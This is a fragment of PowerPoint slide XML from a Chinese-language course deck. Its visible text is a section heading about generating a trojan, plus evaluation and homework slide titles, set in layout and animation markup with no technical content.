              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466215" y="2047240"/>
            <a:ext cx="7965440" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l">
